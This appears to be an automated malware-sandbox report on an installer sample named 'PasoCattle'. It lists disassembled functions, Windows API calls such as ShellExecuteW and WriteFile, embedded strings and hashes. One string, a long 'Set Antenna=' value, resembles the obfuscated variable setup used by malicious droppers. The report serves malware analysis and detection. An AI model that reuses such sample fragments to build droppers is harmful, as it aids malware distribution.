Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user cancel, xrefs: 00401B93
File: error, user abort, xrefs: 00401B53
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user retry, xrefs: 00401B40
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Null, xrefs: 004036AA
Inst, xrefs: 00403698

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB
Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
API String ID: 651206458-1427982325
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
open, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$open
API String ID: 1459762280-1711415406
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
open, xrefs: 00402770

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
